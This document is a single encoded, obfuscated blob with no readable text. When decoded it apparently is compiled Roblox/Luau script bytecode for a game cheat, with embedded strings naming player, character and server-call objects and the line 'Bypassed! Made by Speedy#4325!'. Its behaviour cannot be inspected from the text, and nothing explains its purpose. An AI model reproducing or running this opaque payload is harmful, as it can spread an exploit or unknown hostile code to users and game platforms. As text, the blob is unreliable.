UVB1K88hn85OF2WlL88hnswckNW5L88hnc/CUNX5K88hn87AuNW5L88hnc4v8A3ZL88hnc/AU/BFK88hnc/AUR3xK88hn86nj11hL88hn0zVpx1tL88hnc/AUPBhK88hnc/AUFQhK88hnc/AUSgVK88hnc6CWx1tL88hnc/AUAhNK88hnc/AUTCFK88hnc/CUiHxK88hns/xRTlBL88hnE79+C19L88hnc/CUWH5K88hnc/AU9gVK88hn81jlHGRL88hnc/AUyARK88hnc/AUwQVK88hnc/AU/CpK88hnU3pUTlBL88hn845wTm1L88hnc/AU5AhK88hnc/AUaX5K88hnc/AUlnxK88hns5BYI1dL88hn81iFsmBL88hnc/AUnANK88hnc/AUBA1K88hnc7Ln3nZL88hnc/AUjANK88hnc2KgDFVL88hnc/AUbX1K88hnc/AUvhZK88hn09qRBVZL88hnc/AUrwpK88hn8x1S0GJL88hnE6Bas1FL88hnc/AUehlK88hnc/AUOn5K88hnc/AUAA1K88hn849es1FL88hnc/AU+h9K88hnczgA6GJL88hnc/AUMwRK88hnc/AUeAhK88hns3P95GhL88hncxflA29L88hnc/CUq31K88hns57uA29L88hnc/AUPhtK88hnc/AUXwZK88hnc/AULApK88hnM6CMJllL88hnc7kQiVNL88hnc/AUUBxK88hnc/AUhgZK88hnc/AU9CdK88hnUyvvhFNL88hnszn0YFNL88hnc/AUnQBK88hnc/AUgw5K88hnc/AULAZK88hnE0wgfVNL88hnM5n4+W9L88hnc/AUAB5K88hnc/AUZMtK88hnc/CUiH5K88hn8/by+W9L88hnc/CUvnxK88hnc/AU7gRK88hnk9fRZ1JL88hncxirKQFL88hnc/CUVHxK88hnc/AUnwtK88hnc/AUHX1K88hncyCFKQFL88hnc/AUZH5K88hn87YvTlBL88hncx05rwVL88hnc/AUoBBK88hnc/AUWBJK88hnc/AUPDJK88hnc7QkrwVL88hn82Z0B2lL88hnc/AU5nxK88hnc/AUsApK88hnc/CUcH1K88hnsypPB2lL88hnc/+ztwNL88hnc/CUr31K88hnc/AUPX1K88hnc6j4twNL88hns27/6VdL88hnc/AUu31K88hnc1AJv9lL88hnc/AU/QZK88hnc/AUoB1K88hnc/AUnCJK88hnMyjL5GhL88hnc/AUSgVK88hnc/AUUBVK88hnE17f1l9L88hn036no1FL88hnc/AUnX9K88hnc/AUCX5K88hnc34vpWlL88hnc/zOlQ5L88hnc/AUPwtK88hnc4HWlQ5L88hn89dVLF1L88hnc/AUNQBK88hnc/AUcCtK88hnc/AUdQ9K88hns/o+3FdL88hnk1HoiltL88hnc/AUcgJK88hnc8091FZL88hn8x0BdXpL88hnc/AU1CpK88hnc/AU1nxK88hncy0KnGlL88hnc7Z7D1ZL88hnc/AU1wRK88hnc/AUmwRK88hns999D1ZL88hnc4Uq43BL88hnc/AUwwJK88hnc/AUCwZK88hnc6FU43BL88hnE0pQW1JL88hnc/AURgNK88hnc/AUBC9K88hnc/AU+AVK88hn098qW1JL88hnU/NQYFFL88hnc/AUJOxK88hnc/AUnBdK88hnc/AUin5K88hn82o/z1BL88hnM1N0229L88hnc/AUyBtK88hns2B3229L88hnc/AUZXxK88hnc/AUFw5K88hnc/CUzX9K88hncwi041dL88hns/+CYFZL88hnc/AUSBNK88hnc/AUXBNK88hnc/AU2CFK88hnkwqCYFZL88hnc/AU5wZK88hnc/AUUhRK88hnc/CUpHxK88hnE80uTlBL88hnE4rRqVtL88hnc/AUACNK88hnc/CUIX9K88hnc/AUDhlK88hnM7GqqVtL88hncwpxuAhL88hnc/AU5wRK88hnc/AUQAVK88hnc/AUPARK88hn8+VSdV1L88hnc/AUuQxK88hnc/AU5DFK88hnc/AUhBFK88hnk1svTlBL88hn8wZFjHhL88hnc/AUNMdK88hnc/AUYwBK88hnc8B8mFFL88hnc/AU8ARK88hn8/R402tL88hncxxSKwFL88hnc/AUpMRK88hnc5xcKwFL88hnc/AU3QhK88hnc/AUDCFK88hnk4JXTlBL88hnc+DfJsVL88hnc/AULBZK88hn88KZFGFL88hnc7G+G2pL88hnc/AUjh1K88hnM5a4G2pL88hns3AZFGFL88hnc/AUfABK88hnc/AUPAJK88hns6wIFGFL88hnc/AUDDhK88hnc/AU2hFK88hnc/CUmX1K88hns+vi5GhL88hn85en73FL88hnc/AUlnxK88hn8/P6ZntL88hnc/AUuAZK88hnc8pXTlBL88hnc/AUgQtK88hnc/AUjCpK88hnkyecn1NL88hn80zrzlZL88hnc/AU9wVK88hnc/AU5H9K88hnc/AUBwZK88hnc3CHjvFL88hnc0EtAV9L88hnc/AU8XxK88hns2shAV9L88hnc/AU5CZK88hnc7mtDFVL88hnc9y09CpL88hnc/AUJBZK88hnc/AUWB9K88hnM27qIVZL88hn89pyGlhL88hnc/AUEXxK88hnc/AUKghK88hn8xl4GlhL88hnM/n3fFVL88hnc/AUiwVK88hnU9/yfFVL88hnc/AUcCtK88hnc0YKTFxL88hnc/AU4H1K88hnc/AUXAJK88hnc/AUZC5K88hn83Lm+XZL88hnc/AUmn9K88hnc/AUzhBK88hn08TUgVRL88hnc/AUJOxK88hn8/34QGJL88hnc3qpfQtL88hnc/AUthZK88hnc2Etzn1L88hnc/AUkhZK88hnc/AUWCRK88hnc/AUxDNK88hns/gqTlBL88hnc/AUCB9K88hnc/AUjhJK88hnE6VBnVJL88hnc/AUcQNK88hnc/AU13xK88hn0+hUTlBL88hnc/AUwhdK88hnU7AqTlBL88hnczkc5w1L88hnc/AUDDpK88hns2DhYF5L88hnky5SZlZL88hnc/AU7w5K88hnc+a4uRtL88hnc5tKvwBL88hnc/AU83xK88hnc/AUehJK88hnc9xZvwBL88hns1um8l1L88hnc/AUZDJK88hnc/AUZN9K88hn88qn8l1L88hnc/AUeQlK88hnc/AUoBlK88hnE/JQTlBL88hnc0StsWpL88hnc/AU5CVK88hnc/AUvBdK88hnc4LbOl1L88hnc/AUuw9K88hnEzHXZ1JL88hnc/AUQhpK88hnk5RVTlBL88hnc/AUkwhK88hnk7PQgVRL88hnc/AUBBBK88hnc/AUWBlK88hns/ysDFVL88hnc/AU6wJK88hnc/AUOB5K88hnc/AU6hpK88hnszyrZ1JL88hnsw/KPW5L88hnc/AUWhhK88hnc/AU0BRK88hn857LPW5L88hnc/AUHgFK88hncww5rWVL88hnUwUx1lBL88hnc/AUlMtK88hnc/AUvhpK88hnc/AUKAJK88hnE2M81lBL88hnc/AUlgVK88hnc/AU7QJK88hnc/AU4QlK88hn85tqHXdL88hnc/CU4X1K88hnc/CUXH1K88hnczZcTlBL88hnc/AUQ3xK88hnc/AUOX5K88hnc/AU2wNK88hnE/UvTlBL88hnc/AURwJK88hnc/CUA31K88hnc/AUpARK88hnczsrrlRL88hnc/AUBQpK88hnc/AUqglK88hnE5xRTlBL88hnc9M9eGFL88hnc/AURMxK88hnc/AUuHxK88hnc/AUhhhK88hnc/Cu3dVL88hnc/CUon9K88hnc/AUIwRK88hnM1dVTlBL88hnc/CU/nxK88hnc/CU83xK88hn89TSZ1JL88hnc/AU9QVK88hnc/AUggFK88hnc/AUZOZK88hnM/nUgVRL88hnc/AUQABK88hnc/AUxn9K88hnc/AUpw9K88hnk2JXTlBL88hnc35PDGxL88hnc/AUMQ1K88hnc/AUTDNK88hnc/AU+hlK88hns/UmBlhL88hnc/AU9CdK88hnc/AUFAlK88hnc/AUxhBK88hn05XzY1FL88hnc/AUDgJK88hnsztXTlBL88hnk3DTtlFL88hnc/AUBQBK88hnc5vJ+WFL88hnc/AUgBVK88hnc/AUJN1K88hnc/AUth5K88hnM8Kz0G5L88hn80UgAWNL88hnc/CUW35K88hnc/AUhCBK88hnc/AU/BxK88hns/I7AWNL88hncxAfrcVL88hnc/AUUgNK88hnc/AULDxK88hnc/AUbBFK88hnc9Q+kQpL88hn82k7f1ZL88hnc/AUDgtK88hnc/AU+hdK88hnU6o6f1ZL88hnc/AU0wtK88hnc/AUzQlK88hn82JRTlBL88hnc/AUjH9K88hn8zBQTlBL88hnUx0y6lpL88hnc/CUsXxK88hnsxc26lpL88hnc/CULX5K88hnM2t/H25L88hnc/AUUQxK88hnc/AUnDpK88hnc4Ar8GZL88hnc/AUMAdK88hnc3QoTlBL3KsnnKRUc1tPkZRhry/UoTFeyHzRVGGvL1QxrmbIAw0FRGwcbcB7cikR0RRhry9bts1fyFcNBURsHBJMN3IpH04DfGxSIu9MQykwNe7S4Br9fbB+/Cdu21dhD8rucCPISWycHBETSa8VLMgeeTNGcC2gVkE2KVN5M8ZxLWRY6gYpa2bKfWRmlyihDxP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sXBgRE/gXLxfIfjWu0uAanJOkc/xpEZVsry9j5mtAyA1um1xhD1ApsUXIK8eW0Fuuwul8QCkVUdVqry8RfkZIyEnBXctRdy+zxSkpNuwcGBETuaUNWchLUZVqry+hBbdTyBbBXctRd92ri3gpYHkzxnEtTVDbCCkcKMpeI3gyDKFrRscOvlUFAAAAa21haQBVCwAAAEtpeF9pfnplb2kAVQgAAABcYG11aX5/AFUMAAAAQGNvbWBcYG11aX4AVQoAAABcYG11aX5LeWUAVQ0AAABAY29tYFl8aG14aX4AVQgAAABIaX94fmN1AFUGAAAAQ29pbWIAVRgAAABZYmhpfntteGl+Q3ppfmBtdV9vfmV8eABVCwAAAF94bX54aX5LeWUAVQ8AAABfe2VhYWVia19vfmV8eABVEgAAAF5pfGBlb214aWhfeGN+bWtpAFUWAAAASmViaEplfn94T2RlYGhDak9gbX9/AFUMAAAAXmlhY3hpSXppYngAVQ0AAABcYG11aX5abWB5aX8AVQcAAABObWJiaWgAVQ0AAABeaWFjeGlJemlieH8AVQoAAABDYmlcZWlvaUEAVQUAAAB7bWV4AFUFAAAAe21+YgBVIAAAAE51fG1/f2loLSAsQW1oaSxudSxffGlpaHUvOD8+OS0A88hnc/AUpEw188hnE0jr1V1L88hnc/AUeA5K88hnk6zp1V1L88hns6ybO2VL88hnc/AU9X5K88hnc/CUfnxK88hnc/AUEC1K88hnk2X7hlxL88hn8xu9oVRL88hnc/AUbCZK88hnc/AU6QJK88hnc/CUCn1K88hns+++oVRL88hnc/AUuC1K88hnc/AU8CxK88hnc/AUACtK88hnU8MrTlBL88hnc/AU4AtK88hnc/CU1n5K88hn04tTTlBL88hnc/AUICVK88hnc/AUKgtK88hnc/AUrA1K88hncwyl615L88hnc/hMSXVL88hnc/AUuAxK88hn85jC9FpL88hnc/AUBwlK88hnc/AUMwdK88hnc/CUsX1K88hnc1harn9L88hnc7qmuA9L88hnc/AUOhpK88hnc/ek52VL88hnk5Vp0FxL88hnc/AUhMRK88hnc/AUvwhK88hnM0XIZmxL88hn8wpkuFZL88hnc/AU4CdK88hnc/AUEQdK88hnc/AUrwpK88hnc6rmdnFL88hnU7E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